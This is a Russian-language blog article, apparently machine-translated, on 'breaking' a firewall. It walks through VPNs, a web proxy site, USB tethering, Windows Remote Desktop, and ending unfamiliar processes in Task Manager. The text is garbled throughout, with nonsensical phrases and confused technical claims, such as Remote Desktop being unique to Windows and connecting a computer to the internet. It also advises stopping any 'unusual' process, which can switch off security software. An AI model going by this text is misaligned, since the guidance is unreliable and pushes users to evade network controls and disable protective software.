Вы можете легко найти нужную вам услугу VPN в Интернете бесплатно. Но подумайте о том, чтобы заплатить за бесплатно, потому что всегда есть цена, которую вы платите за бесплатные вещи. Популярные VPN, такие как NordVPN OR ExpressVPN Вот некоторые из популярных вариантов услуг VPN, которые люди предпочитают иметь над чем-либо еще. Если вы ищете, как взломать брандмауэр, вы можете сделать это с помощью VPN-сервисов.

ExpressVPN

Вот как сломать брандмауэр с помощью VPN-сервисов

Вот шаги, которые вы можете выполнить, чтобы активировать VPN на своем телефоне.

  • Загрузите VPN, выбрав подходящую услугу VPN.
  • Вторым шагом будет создание учетной записи. Некоторые VPN-сервисы требуют только ввода вашего адреса электронной почты.
  • В то время как другим потребуются ваше имя, адрес электронной почты, номер телефона, пароль, адрес и другая информация. Обычно это вещи, с которыми вам приходится иметь дело, выбирая опыт премиум-класса.
  • Как только вы закончите с этим, вы готовы пользоваться услугой VPN. Выберите страну и затем начните просмотр сайтов, которые не могли открыться час назад.

№2. Как взломать брандмауэр через веб-прокси

Если вы не хотите иметь дело со службами VPN или даже использовать стороннее программное обеспечение для просмотра веб-сайтов, которые вам нравятся. Итак, как сломать брандмауэр, не используя VPN-сервисы? К счастью, есть другой способ просмотра вашего любимого веб-сайта без использования VPN. Ответ - веб-прокси. Интернет - это огромное место, в то время как веб-сайты, к которым вы получаете доступ каждый день, ведут вас к продукту, но в Интернете есть множество веб-сайтов, которые будут иметь доступ к другим вашим веб-сайтам. Здесь вы используете прокси для обхода другого прокси.

Вместо подключения к виртуальной частной сети для доступа к сайту, который вы хотите посетить. Здесь это намного проще, чем VPN.

Первый шаг - перейти на веб-прокси-сайты. Один из этих сайтов называется Unblocksites.online, Весь сайт будет выглядеть и чувствовать себя как обычный сайт, а в некоторых случаях это как обычный сайт.


Вторым шагом было бы найти адресную строку на сайте. Думайте об этом как о строке поиска на Google. Как только вы найдете адресную строку, вам нужно будет ввести адрес сайтов, к которым вы хотите получить доступ. Прямо рядом с панелью поиска будет кнопка. После нажатия кнопки вы будете перенаправлены на веб-страницу, которую хотите использовать.


Пристальный взгляд

Теперь, когда вы знаете, как пройти через систему брандмауэра, чтобы получить доступ к вашим любимым веб-сайтам. Существует проблема с использованием этой службы или способа доступа к той части Интернета, к которой вы хотите получить доступ. Проблема в том, что этот метод может работать или не работать для вашей сети. Многие службы брандмауэра блокируют доступ этих сайтов к пользователю.

Это не будет одинаковым для всех пользователей онлайн. Если вы живете в месте, где у вас нет жестких ограничений в вашей сети, вы сможете использовать эти веб-сайты для перехода на свои любимые сайты. но эти сайты будут заблокированы, если ваши услуги WIFI будут следовать более строгим правилам в их Интернете.

№3. Как взломать брандмауэр через модем

Открытый чат

Если ваша сеть WIFI является проблемой между вами и сайтом, который вы хотите посетить. Тогда у вас есть возможность переключиться на другую сеть. Вы можете сделать это через обычный смартфон. Все смартфоны имеют привязные услуги в них. Что он делает, это позволяет пользователю иметь Интернет на компьютере через телефон.

Если вы беспокоитесь о скорости, то не надо. Передача данных очень быстро через модем. И одна из лучших сторон этого способа подключения к Интернету - стабильность, которую вы получаете, используя это. Обычно соединение Wi-Fi имеет тенденцию разрываться через некоторое время. Использование WIFI всегда подвергает риску всю вашу сеть. Есть много вещей, которые могут случиться; Если вы используете Wi-Fi в качестве интернет-сервиса, вы должны поддерживать сервис каждый день. Смена паролей является одним из них, поэтому никто не может просто напрямую подключиться к вашей точке доступа, просто нажав на имя.

PS: нажмите здесь, чтобы узнать больше о Функция брандмауэраи Брандмауэр Centos 6 Функции, а также все о Зональный межсетевой экран.

Как сломать брандмауэр с помощью USB-модема

  • Получить кабель для передачи данных в Интернете или в местном магазине
  • Подключите зарядное устройство от ПК к вашему смартфону. Прямоугольный конец провода входит в USB-разъем компьютера, а другие концы зацепляются в отверстие в нижней части телефона.
  • Когда вы закончите подключение телефона к компьютеру. Вы получите всплывающее уведомление о том, что ваш телефон был подключен к вашему телефону. Технически, телефон подключен, но вы не можете получить доступ к Интернету с телефона.
  • По умолчанию модель сидит на зарядке или передаче файла. Мы хотим USB-модем, зайдите в настройки вашего телефона, в меню подключения. Здесь вы найдете вариант привязки, просто включите его.
  • Последнее, что вам нужно сделать, это подключиться к Интернету. Тогда на вашем компьютере будет готов Интернет.

№4. Через удаленный рабочий стол

Если вы когда-либо использовали операционную систему Windows, то вы наверняка сталкивались с приложением для удаленного рабочего стола. Это дополнение действительно уникально для окон. Он поставляется с каждой вариацией окон. Этот настольный клиент поможет вам подключиться к другому компьютеру или к интернету. Но для того, чтобы сделать это, вы должны выполнить большое количество шагов, чтобы это произошло. Не позволяй этому расстроить тебя. Ниже вы получите всю информацию, необходимую для запуска собственного удаленного рабочего стола.

Как сломать брандмауэр с помощью удаленного рабочего стола

  • Во-первых, мы собираемся разрешить удаленный рабочий стол. открыто панель управления > система и безопасность > разрешить удаленный доступ.
  • Затем нажмите разрешить удаленное подключение к этому компьютеру, Вы можете сделать это, установив флажок.
  • После этого нажмите ОК и примените поздравления; ваш компьютер готов к удаленному подключению.

Чтобы запустить удаленный доступ через Интернет, вам необходимо настроить маршрутизатор для разрешения удаленного подключения. Для этого вам понадобится ваш IP-адрес. Если ваш компьютер подключен к динамическим службам, то IP-адрес ее будет часто меняться. Вам нужно будет получить ваш статический IP-адрес. Таким образом, вам не нужно настраивать все это каждый раз, когда вы хотите подключиться к Интернету.

№5. Завершение процесса

Если есть программное обеспечение, которое не позволяет вам подключиться к веб-сайту, вы можете просто остановить эту службу или отключить ее навсегда. Это избавит вас от множества проблем при настройке альтернативного маршрута к вашим любимым сайтам. Вот еще один способ обойти систему брандмауэра.

Все, что вам нужно сделать, это открыть свой менеджер задач, Вы можете сделать это, щелкнув правой кнопкой мыши на панели задач, а затем нажав на диспетчере задач. Если вам понравился подход, то нажмите Ctrl + Alt + DeleteВы выбираете процесс оттуда. Попав в диспетчер задач, найдите сервис, который вы находите необычным. Это программное обеспечение будет иметь разные имена и описания рядом с ними. Здесь вы можете отключить эти процессы или не дать им вернуться к обычному просмотру.

Может потребоваться перезагрузить компьютер, чтобы показать полный эффект.

Заключение о том, как сломать брандмауэр

Выполнение этих шагов поможет вам предотвратить и изучить правила как пройти брандмауэр с вашего компьютера. Технически все перечисленные услуги не потребуют от вас тратить на них ни копейки. Просто подумайте об этом как о техническом волшебстве, чтобы решить вашу техническую проблему. Пользователь гривы ищет компьютер как сломать брандмауэр ежедневно, потому что при ненадлежащих правилах брандмауэр может блокировать практически все в Интернете.

Читайте также: